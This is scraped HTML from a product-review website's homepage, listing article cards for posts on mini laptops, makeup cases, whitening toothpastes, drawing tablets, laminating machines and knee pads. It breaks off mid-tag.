<div class="post-thumbnail"> <a href="https://www.business99.net/mini-laptops/" rel="bookmark"> <img width="386" height="258" src="https://i1.wp.com/www.business99.net/wp-content/uploads/2019/03/Mini-Laptop.jpg?resize=386%2C258&amp;ssl=1" class="attachment-supersport-post-featured-grid size-supersport-post-featured-grid wp-post-image jetpack-lazy-image" alt="Mini Laptop" data-attachment-id="14191" data-permalink="https://www.business99.net/mini-laptops/mini-laptop-2/" data-orig-file="https://i1.wp.com/www.business99.net/wp-content/uploads/2019/03/Mini-Laptop.jpg?fit=750%2C450&amp;ssl=1" data-orig-size="750,450" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="Mini Laptop" data-image-description="" data-medium-file="https://i1.wp.com/www.business99.net/wp-content/uploads/2019/03/Mini-Laptop.jpg?fit=300%2C180&amp;ssl=1" data-large-file="https://i1.wp.com/www.business99.net/wp-content/uploads/2019/03/Mini-Laptop.jpg?fit=640%2C384&amp;ssl=1" data-lazy-srcset="https://i1.wp.com/www.business99.net/wp-content/uploads/2019/03/Mini-Laptop.jpg?zoom=2&amp;resize=386%2C258&amp;ssl=1 772w, https://i1.wp.com/www.business99.net/wp-content/uploads/2019/03/Mini-Laptop.jpg?zoom=3&amp;resize=386%2C258&amp;ssl=1 1158w" data-lazy-sizes="(max-width: 386px) 100vw, 386px" data-lazy-src="https://i1.wp.com/www.business99.net/wp-content/uploads/2019/03/Mini-Laptop.jpg?resize=386%2C258&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /> </a> </div> <div class="posts-info-container medium-post-content"> <header class="entry-header"> <div class="info-category"><span class="con-cat"><a href="https://www.business99.net/category/electronics-computers/" rel="category tag">Electronics &amp; Computers</a></div> <h2 class="entry-title"><a href="https://www.business99.net/mini-laptops/" rel="bookmark">Best Mini Laptops | Extremely Portable and Compact</a></h2> </header><!-- .entry-header --> </div> </article> <article id="post-15160" class="mid-medium-post clearfix post-15160 post type-post status-publish format-standard has-post-thumbnail hentry category-beauty-personal-care tag-cases tag-makeup tag-rolling" > <div class="post-thumbnail"> <a href="https://www.business99.net/rolling-makeup-cases/" rel="bookmark"> <img width="386" height="258" src="https://i1.wp.com/www.business99.net/wp-content/uploads/2019/04/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-1-62.jpg?resize=386%2C258&amp;ssl=1" class="attachment-supersport-post-featured-grid size-supersport-post-featured-grid wp-post-image jetpack-lazy-image" alt="Rolling Makeup Cases" data-attachment-id="15172" data-permalink="https://www.business99.net/rolling-makeup-cases/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-68/" data-orig-file="https://i1.wp.com/www.business99.net/wp-content/uploads/2019/04/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-1-62.jpg?fit=750%2C450&amp;ssl=1" data-orig-size="750,450" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="Rolling Makeup Cases" data-image-description="" data-medium-file="https://i1.wp.com/www.business99.net/wp-content/uploads/2019/04/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-1-62.jpg?fit=300%2C180&amp;ssl=1" data-large-file="https://i1.wp.com/www.business99.net/wp-content/uploads/2019/04/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-1-62.jpg?fit=640%2C384&amp;ssl=1" data-lazy-srcset="https://i1.wp.com/www.business99.net/wp-content/uploads/2019/04/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-1-62.jpg?zoom=2&amp;resize=386%2C258&amp;ssl=1 772w, https://i1.wp.com/www.business99.net/wp-content/uploads/2019/04/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-1-62.jpg?zoom=3&amp;resize=386%2C258&amp;ssl=1 1158w" data-lazy-sizes="(max-width: 386px) 100vw, 386px" data-lazy-src="https://i1.wp.com/www.business99.net/wp-content/uploads/2019/04/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-1-62.jpg?resize=386%2C258&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /> </a> </div> <div class="posts-info-container medium-post-content"> <header class="entry-header"> <div class="info-category"><span class="con-cat"><a href="https://www.business99.net/category/beauty-personal-care/" rel="category tag">Beauty &amp; Personal Care</a></div> <h2 class="entry-title"><a href="https://www.business99.net/rolling-makeup-cases/" rel="bookmark">Best Rolling Makeup Cases | Get One Now!</a></h2> </header><!-- .entry-header --> </div> </article> <article id="post-15139" class="mid-medium-post clearfix post-15139 post type-post status-publish format-standard has-post-thumbnail hentry category-beauty-personal-care tag-teeth tag-toothpastes tag-whitening" > <div class="post-thumbnail"> <a href="https://www.business99.net/teeth-whitening-toothpastes/" rel="bookmark"> <img width="386" height="258" src="https://i0.wp.com/www.business99.net/wp-content/uploads/2019/04/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-1-61.jpg?resize=386%2C258&amp;ssl=1" class="attachment-supersport-post-featured-grid size-supersport-post-featured-grid wp-post-image jetpack-lazy-image" alt="Teeth Whitening Toothpastes" data-attachment-id="15158" data-permalink="https://www.business99.net/teeth-whitening-toothpastes/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-67/" data-orig-file="https://i0.wp.com/www.business99.net/wp-content/uploads/2019/04/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-1-61.jpg?fit=750%2C450&amp;ssl=1" data-orig-size="750,450" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="Teeth Whitening Toothpastes" data-image-description="" data-medium-file="https://i0.wp.com/www.business99.net/wp-content/uploads/2019/04/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-1-61.jpg?fit=300%2C180&amp;ssl=1" data-large-file="https://i0.wp.com/www.business99.net/wp-content/uploads/2019/04/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-1-61.jpg?fit=640%2C384&amp;ssl=1" data-lazy-srcset="https://i0.wp.com/www.business99.net/wp-content/uploads/2019/04/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-1-61.jpg?zoom=2&amp;resize=386%2C258&amp;ssl=1 772w, https://i0.wp.com/www.business99.net/wp-content/uploads/2019/04/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-1-61.jpg?zoom=3&amp;resize=386%2C258&amp;ssl=1 1158w" data-lazy-sizes="(max-width: 386px) 100vw, 386px" data-lazy-src="https://i0.wp.com/www.business99.net/wp-content/uploads/2019/04/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-1-61.jpg?resize=386%2C258&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /> </a> </div> <div class="posts-info-container medium-post-content"> <header class="entry-header"> <div class="info-category"><span class="con-cat"><a href="https://www.business99.net/category/beauty-personal-care/" rel="category tag">Beauty &amp; Personal Care</a></div> <h2 class="entry-title"><a href="https://www.business99.net/teeth-whitening-toothpastes/" rel="bookmark">Best Teeth Whitening Toothpastes | Keep Your Teeth Whiten</a></h2> </header><!-- .entry-header --> </div> </article> </div><!-- /.magazine-posts-featured --> </div> </div> </div></div><div class="magazine-homepage-wrap clearfix"><div id="magazine-homepage-layout" class="main-magazine-homepage magazine-homepage clearfix"><div id="magazine-posts-lists-2" class="widget supersport-magazine-posts-lists"> <div class="widget-magazine-posts-lists widget-magazine-posts clearfix"> <div class="widget-magazine-posts-content"> <div class="magazine-posts-lists clearfix"> <article id="post-4831" class="left-post post-item clearfix post-4831 post type-post status-publish format-standard has-post-thumbnail hentry category-electronics-computers tag-drawing tag-tablet"> <div class="thumbnail"> <a href="https://www.business99.net/drawing-tablet/" rel="bookmark"> <img width="260" height="160" src="https://i2.wp.com/www.business99.net/wp-content/uploads/2017/09/drawing-tablet.jpg?resize=260%2C160&amp;ssl=1" class="attachment-supersport-thumbnail-list size-supersport-thumbnail-list wp-post-image jetpack-lazy-image" alt="" data-attachment-id="5105" data-permalink="https://www.business99.net/drawing-tablet/drawing-tablet/" data-orig-file="https://i2.wp.com/www.business99.net/wp-content/uploads/2017/09/drawing-tablet.jpg?fit=650%2C300&amp;ssl=1" data-orig-size="650,300" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="drawing tablet" data-image-description="" data-medium-file="https://i2.wp.com/www.business99.net/wp-content/uploads/2017/09/drawing-tablet.jpg?fit=300%2C138&amp;ssl=1" data-large-file="https://i2.wp.com/www.business99.net/wp-content/uploads/2017/09/drawing-tablet.jpg?fit=640%2C295&amp;ssl=1" data-lazy-srcset="https://i2.wp.com/www.business99.net/wp-content/uploads/2017/09/drawing-tablet.jpg?zoom=2&amp;resize=260%2C160&amp;ssl=1 520w, https://i2.wp.com/www.business99.net/wp-content/uploads/2017/09/drawing-tablet.jpg?zoom=3&amp;resize=260%2C160&amp;ssl=1 780w" data-lazy-sizes="(max-width: 260px) 100vw, 260px" data-lazy-src="https://i2.wp.com/www.business99.net/wp-content/uploads/2017/09/drawing-tablet.jpg?resize=260%2C160&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /> </a> </div> <header class="entry-header"> <h2 class="entry-title"><a href="https://www.business99.net/drawing-tablet/" rel="bookmark">Best Drawing Tablet in 2019</a></h2> <div class="entry-meta"> <span class="meta-date posted-on"><time class="entry-date published updated" datetime="2019-05-06T09:28:50+00:00">May 6, 2019</time></span><span class="meta-author byline"><span class="author vcard"><a class="url fn n" href="https://www.business99.net/author/panha/" title="View all posts by Panha chea" rel="author">Panha chea</a></span></span><span class="meta-category"> <a href="https://www.business99.net/category/electronics-computers/" rel="category tag">Electronics &amp; Computers</a></span> </div> </header><!-- .entry-header --> <div class="entry-content"> <p>Do you want to hand draw designs, images, graphics or animations? Looking for the best drawing tablet? Well, your search[&#8230;]</p> </div><!-- .entry-content --> </article> <article id="post-5939" class="left-post post-item clearfix post-5939 post type-post status-publish format-standard has-post-thumbnail hentry category-electronics-computers tag-laminating tag-machines"> <div class="thumbnail"> <a href="https://www.business99.net/laminating-machines/" rel="bookmark"> <img width="260" height="160" src="https://i0.wp.com/www.business99.net/wp-content/uploads/2017/11/Laminating-Machines.jpg?resize=260%2C160&amp;ssl=1" class="attachment-supersport-thumbnail-list size-supersport-thumbnail-list wp-post-image jetpack-lazy-image" alt="Laminating Machines" data-attachment-id="6268" data-permalink="https://www.business99.net/laminating-machines/laminating-machines-2/" data-orig-file="https://i0.wp.com/www.business99.net/wp-content/uploads/2017/11/Laminating-Machines.jpg?fit=628%2C275&amp;ssl=1" data-orig-size="628,275" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="Laminating Machines" data-image-description="" data-medium-file="https://i0.wp.com/www.business99.net/wp-content/uploads/2017/11/Laminating-Machines.jpg?fit=300%2C131&amp;ssl=1" data-large-file="https://i0.wp.com/www.business99.net/wp-content/uploads/2017/11/Laminating-Machines.jpg?fit=628%2C275&amp;ssl=1" data-lazy-srcset="https://i0.wp.com/www.business99.net/wp-content/uploads/2017/11/Laminating-Machines.jpg?resize=260%2C160&amp;ssl=1 260w, https://i0.wp.com/www.business99.net/wp-content/uploads/2017/11/Laminating-Machines.jpg?zoom=2&amp;resize=260%2C160&amp;ssl=1 520w" data-lazy-sizes="(max-width: 260px) 100vw, 260px" data-lazy-src="https://i0.wp.com/www.business99.net/wp-content/uploads/2017/11/Laminating-Machines.jpg?resize=260%2C160&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /> </a> </div> <header class="entry-header"> <h2 class="entry-title"><a href="https://www.business99.net/laminating-machines/" rel="bookmark">Best Laminating Machines | Get Your Photo Laminate Right Now</a></h2> <div class="entry-meta"> <span class="meta-date posted-on"><time class="entry-date published updated" datetime="2019-05-06T08:24:02+00:00">May 6, 2019</time></span><span class="meta-author byline"><span class="author vcard"><a class="url fn n" href="https://www.business99.net/author/lyne/" title="View all posts by lyne chanchou" rel="author">lyne chanchou</a></span></span><span class="meta-category"> <a href="https://www.business99.net/category/electronics-computers/" rel="category tag">Electronics &amp; Computers</a></span> </div> </header><!-- .entry-header --> <div class="entry-content"> <p>Laminating machines are widely used in homes and for office purpose to save documents from wear and tear, improve their[&#8230;]</p> </div><!-- .entry-content --> </article> <article id="post-4890" class="left-post post-item clearfix post-4890 post type-post status-publish format-standard has-post-thumbnail hentry category-electronics-computers tag-laptops tag-mini"> <div class="thumbnail"> <a href="https://www.business99.net/mini-laptops/" rel="bookmark"> <img width="260" height="160" src="https://i1.wp.com/www.business99.net/wp-content/uploads/2019/03/Mini-Laptop.jpg?resize=260%2C160&amp;ssl=1" class="attachment-supersport-thumbnail-list size-supersport-thumbnail-list wp-post-image jetpack-lazy-image" alt="Mini Laptop" data-attachment-id="14191" data-permalink="https://www.business99.net/mini-laptops/mini-laptop-2/" data-orig-file="https://i1.wp.com/www.business99.net/wp-content/uploads/2019/03/Mini-Laptop.jpg?fit=750%2C450&amp;ssl=1" data-orig-size="750,450" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="Mini Laptop" data-image-description="" data-medium-file="https://i1.wp.com/www.business99.net/wp-content/uploads/2019/03/Mini-Laptop.jpg?fit=300%2C180&amp;ssl=1" data-large-file="https://i1.wp.com/www.business99.net/wp-content/uploads/2019/03/Mini-Laptop.jpg?fit=640%2C384&amp;ssl=1" data-lazy-srcset="https://i1.wp.com/www.business99.net/wp-content/uploads/2019/03/Mini-Laptop.jpg?zoom=2&amp;resize=260%2C160&amp;ssl=1 520w, https://i1.wp.com/www.business99.net/wp-content/uploads/2019/03/Mini-Laptop.jpg?zoom=3&amp;resize=260%2C160&amp;ssl=1 780w" data-lazy-sizes="(max-width: 260px) 100vw, 260px" data-lazy-src="https://i1.wp.com/www.business99.net/wp-content/uploads/2019/03/Mini-Laptop.jpg?resize=260%2C160&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /> </a> </div> <header class="entry-header"> <h2 class="entry-title"><a href="https://www.business99.net/mini-laptops/" rel="bookmark">Best Mini Laptops | Extremely Portable and Compact</a></h2> <div class="entry-meta"> <span class="meta-date posted-on"><time class="entry-date published updated" datetime="2019-05-05T09:34:54+00:00">May 5, 2019</time></span><span class="meta-author byline"><span class="author vcard"><a class="url fn n" href="https://www.business99.net/author/norin/" title="View all posts by Norin Thong" rel="author">Norin Thong</a></span></span><span class="meta-category"> <a href="https://www.business99.net/category/electronics-computers/" rel="category tag">Electronics &amp; Computers</a></span> </div> </header><!-- .entry-header --> <div class="entry-content"> <p>Making the right or wrong decision, it&#8217;s your opinion. However, we are here to assist you in coming up with[&#8230;]</p> </div><!-- .entry-content --> </article> <article id="post-15160" class="left-post post-item clearfix post-15160 post type-post status-publish format-standard has-post-thumbnail hentry category-beauty-personal-care tag-cases tag-makeup tag-rolling"> <div class="thumbnail"> <a href="https://www.business99.net/rolling-makeup-cases/" rel="bookmark"> <img width="260" height="160" src="https://i1.wp.com/www.business99.net/wp-content/uploads/2019/04/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-1-62.jpg?resize=260%2C160&amp;ssl=1" class="attachment-supersport-thumbnail-list size-supersport-thumbnail-list wp-post-image jetpack-lazy-image" alt="Rolling Makeup Cases" data-attachment-id="15172" data-permalink="https://www.business99.net/rolling-makeup-cases/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-68/" data-orig-file="https://i1.wp.com/www.business99.net/wp-content/uploads/2019/04/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-1-62.jpg?fit=750%2C450&amp;ssl=1" data-orig-size="750,450" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="Rolling Makeup Cases" data-image-description="" data-medium-file="https://i1.wp.com/www.business99.net/wp-content/uploads/2019/04/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-1-62.jpg?fit=300%2C180&amp;ssl=1" data-large-file="https://i1.wp.com/www.business99.net/wp-content/uploads/2019/04/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-1-62.jpg?fit=640%2C384&amp;ssl=1" data-lazy-srcset="https://i1.wp.com/www.business99.net/wp-content/uploads/2019/04/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-1-62.jpg?zoom=2&amp;resize=260%2C160&amp;ssl=1 520w, https://i1.wp.com/www.business99.net/wp-content/uploads/2019/04/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-1-62.jpg?zoom=3&amp;resize=260%2C160&amp;ssl=1 780w" data-lazy-sizes="(max-width: 260px) 100vw, 260px" data-lazy-src="https://i1.wp.com/www.business99.net/wp-content/uploads/2019/04/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-1-62.jpg?resize=260%2C160&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /> </a> </div> <header class="entry-header"> <h2 class="entry-title"><a href="https://www.business99.net/rolling-makeup-cases/" rel="bookmark">Best Rolling Makeup Cases | Get One Now!</a></h2> <div class="entry-meta"> <span class="meta-date posted-on"><time class="entry-date published updated" datetime="2019-04-11T14:43:59+00:00">April 11, 2019</time></span><span class="meta-author byline"><span class="author vcard"><a class="url fn n" href="https://www.business99.net/author/seavping/" title="View all posts by seavping khou" rel="author">seavping khou</a></span></span><span class="meta-category"> <a href="https://www.business99.net/category/beauty-personal-care/" rel="category tag">Beauty &amp; Personal Care</a></span> </div> </header><!-- .entry-header --> <div class="entry-content"> <p>Most people are fond of makeups, but somehow they may find themselves traveling more often. We like carrying our makeup[&#8230;]</p> </div><!-- .entry-content --> </article> <article id="post-15139" class="left-post post-item clearfix post-15139 post type-post status-publish format-standard has-post-thumbnail hentry category-beauty-personal-care tag-teeth tag-toothpastes tag-whitening"> <div class="thumbnail"> <a href="https://www.business99.net/teeth-whitening-toothpastes/" rel="bookmark"> <img width="260" height="160" src="https://i0.wp.com/www.business99.net/wp-content/uploads/2019/04/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-1-61.jpg?resize=260%2C160&amp;ssl=1" class="attachment-supersport-thumbnail-list size-supersport-thumbnail-list wp-post-image jetpack-lazy-image" alt="Teeth Whitening Toothpastes" data-attachment-id="15158" data-permalink="https://www.business99.net/teeth-whitening-toothpastes/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-67/" data-orig-file="https://i0.wp.com/www.business99.net/wp-content/uploads/2019/04/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-1-61.jpg?fit=750%2C450&amp;ssl=1" data-orig-size="750,450" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="Teeth Whitening Toothpastes" data-image-description="" data-medium-file="https://i0.wp.com/www.business99.net/wp-content/uploads/2019/04/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-1-61.jpg?fit=300%2C180&amp;ssl=1" data-large-file="https://i0.wp.com/www.business99.net/wp-content/uploads/2019/04/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-1-61.jpg?fit=640%2C384&amp;ssl=1" data-lazy-srcset="https://i0.wp.com/www.business99.net/wp-content/uploads/2019/04/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-1-61.jpg?zoom=2&amp;resize=260%2C160&amp;ssl=1 520w, https://i0.wp.com/www.business99.net/wp-content/uploads/2019/04/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-1-61.jpg?zoom=3&amp;resize=260%2C160&amp;ssl=1 780w" data-lazy-sizes="(max-width: 260px) 100vw, 260px" data-lazy-src="https://i0.wp.com/www.business99.net/wp-content/uploads/2019/04/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-1-61.jpg?resize=260%2C160&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /> </a> </div> <header class="entry-header"> <h2 class="entry-title"><a href="https://www.business99.net/teeth-whitening-toothpastes/" rel="bookmark">Best Teeth Whitening Toothpastes | Keep Your Teeth Whiten</a></h2> <div class="entry-meta"> <span class="meta-date posted-on"><time class="entry-date published updated" datetime="2019-04-11T14:43:57+00:00">April 11, 2019</time></span><span class="meta-author byline"><span class="author vcard"><a class="url fn n" href="https://www.business99.net/author/seavping/" title="View all posts by seavping khou" rel="author">seavping khou</a></span></span><span class="meta-category"> <a href="https://www.business99.net/category/beauty-personal-care/" rel="category tag">Beauty &amp; Personal Care</a></span> </div> </header><!-- .entry-header --> <div class="entry-content"> <p>For some reasons, many people prefer not to use tooth whitening toothpaste for fear that it may have some long[&#8230;]</p> </div><!-- .entry-content --> </article> <article id="post-15174" class="left-post post-item clearfix post-15174 post type-post status-publish format-standard has-post-thumbnail hentry category-sports-outdoors tag-knee tag-pads tag-work"> <div class="thumbnail"> <a href="https://www.business99.net/knee-pads-for-work/" rel="bookmark"> <img width="260" height="160" src="https://i1.wp.com/www.business99.net/wp-content/uploads/2019/04/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-1-73.jpg?resize=260%2C160&amp;ssl=1" class="attachment-supersport-thumbnail-list size-supersport-thumbnail-list wp-post-image jetpack-lazy-image" alt="Knee Pads For Work" data-attachment-id="15200" data-permalink="https://www.business99.net/knee-pads-for-work/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-79/" data-orig-file="https://i1.wp.com/www.business99.net/wp-content/uploads/2019/04/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-1-73.jpg?fit=750%2C450&amp;ssl=1" data-orig-size="750,450" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="Knee Pads For Work" data-image-description="" data-medium-file="https://i1.wp.com/www.business99.net/wp-content/uploads/2019/04/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-1-73.jpg?fit=300%2C180&amp;ssl=1" data-large-file="https://i1.wp.com/www.business99.net/wp-content/uploads/2019/04/faucets-repair-2-handle-pull-down-kitchen-faucet-wall-mount-kitchen-faucet-with-pull-out-spray-best-water-filter-for-kitchen-faucet-kitchen-1-73.jpg?fit=640%2C384&amp;ssl=1" 